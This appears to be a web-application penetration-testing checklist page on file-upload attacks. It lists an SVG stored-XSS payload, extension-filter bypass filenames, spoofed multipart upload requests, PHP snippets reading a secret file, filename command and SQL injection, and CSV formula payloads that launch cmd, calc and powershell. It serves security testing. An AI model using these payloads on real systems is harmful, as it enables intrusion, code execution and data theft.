Upload of Unexpected File Types

Check List

Methodology

Black Box

Stored Cross-Site Scripting (Stored XSS) via SVG Upload

1

Login to Account

2

Access your account with valid credentials

3

Open Your Project

4

Navigate to the specific project you want to test

5

Go to the locate the avatar upload form

6

Attach PNG File with SVG Code and Upload a PNG file containing the SVG code

<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload="alert(1)" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> </svg>
7

Click forward the request and after creating the image, open it and Check if an alert dialog appears; if not, click the triangle again to confirm

File Extension Filter Bypass

1

Check what are file extensions allowed in the web app. This depends on the type of backend server

.php ,.html, .jsp, .svg, .asp, .aspx ,pHp, pHP5, PhAr, hTmL, etc ,.pht ,.phps ,.phar ,.phpt ,.pgif ,.phtml ,.phtm ,.inc

2

Double-Extension Upload Bypass

Try adding a valid extension before the execution extension exploit.png.php or exploit.php.png

3

Trailing-Extension Upload Bypass

Check adding a valid extension at the end exploit.php/.jpg ( app may save this as a .php file but recognizes as .jpg)

4

Encoding Bypass

Try encoding exploit.php%0d%0a.jpg or exploit.jpg%0d%0a.php

5

Null Byte Injection Bypass

Upload a file with a null byte injection exploit.php%00.jpg or exploit.jpg%00.php

6

Semicolon Extension bypass

Add semicolons before the file extension exploit.asp;.jpg

7

Multibyte Unicode Filename Normalization Bypass

Try using multibyte unicode characters, which may be converted to null bytes and dots after unicode conversion or normalization Sequences like xC0 x2E, xC4 xAE or xC0 xAE may be translated to x2E if the filename parsed as a UTF-8 string, but then converted to ASCII characters before being used in a path

8

Overlapping-Extension Bypass

Try positioning the prohibited string in such a way that removing it still leaves behind a valid file extension. For example, consider what happens if you strip .php from the following filename exploit.p.phphp

9

Filename-Based XSS

Try to put the XSS payload in the name of the filetest.jpg,test.jpg

10

Filename-Based Command Injection

Command Injection in the filename e.g. ; sleep 10;

11

Content-Type Spoofing

Try to use extension as .html and change Content-Type to html/text

------WebKitFormBoundary6IrxqgTfmnW0FkOZ
Content-Disposition: form-data; name="uploadimage"; 
filename="exploit.html"
Content-Type: html/text
12

Missing Content-Type Upload Bypass

Try to send the request with no Content-Type

------WebKitFormBoundary6IrxqgTfmnW0FkOZ
Content-Disposition: form-data; name="uploadimage"; 
filename="exploit.html"


<code here>
13

Content-Type Spoofing

Try to use extension as .jpg/png ( if app expects image only) but change Content-Type to text/html

------WebKitFormBoundary6IrxqgTfmnW0FkOZ
Content-Disposition: form-data; name="uploadimage"; 
filename="exploit.jpg"
Content-Type: text/html
14

Extensionless Upload + Content-Type Spoofing

Try leaving extension blank and Content-Type text/html

------WebKitFormBoundary6IrxqgTfmnW0FkOZ
Content-Disposition: form-data; name="uploadimage"; 
filename="file."
Content-Type: text/html
15

Extension-Only Upload + Content-Type Spoofing

Try using the extension only 

------WebKitFormBoundary6IrxqgTfmnW0FkOZ
Content-Disposition: form-data; name="uploadimage"; 
filename=".html"
Content-Type: image/png
16

Filename Special-Characters Bypass

Try to use especial characters in the names

------WebKitFormBoundary6IrxqgTfmnW0FkOZ
Content-Disposition: form-data; name="uploadimage";
filename="exploit.jpg#/?&=+.html"
Content-Type: image/jpeg
17

File Upload Manipulation

Try changing Content-Type When uploading, Content Type could be: Content-Type: application/octet-stream or Content-Type: application/x-php try replacing it withimage/jpeg/,image/jpg, image.png, image/gif

------WebKitFormBoundary6IrxqgTfmnW0FkOZ
Content-Disposition: form-data; name="avatar"; filename="exploit.php"
Content-Type: application/octet-stream

<?php echo file_get_contents('/home/carlos/secret'); ?>
18

Unicode Bypass

Try to use Unicode

Content-Disposition: form-data; name="uploadimage"; 
filename="exploit.jpg%u0025%u0030%u0039.php"
Content-Type: application/php

<?php echo file_get_contents('/home/carlos/secret'); ?>
19

Time-Based SQLi Payloads

poc.js'(select*from(select(sleep(20)))a)+'.extension

CSV Injection

1

Register an account and explore all features that allow sending data that will later be visible/exported by an admin or another user

2

Look specifically for contact forms, feedback forms, support tickets, guestbook, comments, or any “send message to admin” functionality

3

Submit a normal message and confirm that the admin can view and export these messages as CSV/Excel

4

Craft and send the following classic CSV injection payloads in any text field that will appear in the exported file (name, message, email, subject, etc.)

=DDE("cmd";"/C calc";"!A0")A0
=2+5
=cmd|'/C calc'!A0
=cmd|'/C powershell'!A0
=4+4
=1+1+1+1+1
@SUM(1+1)*cmd|'/C calc'!A0
5

Wait or ask the admin in real scenario the victim opens the file to export/download the messages as CSV

6

When the exported CSV file is opened in Microsoft Excel, LibreOffice Calc, Google Sheets (when imported or any spreadsheet software

White Box

Cheat Sheet

PreviousDefenses Against Application MisuseNextUpload of Malicious Files

Last updated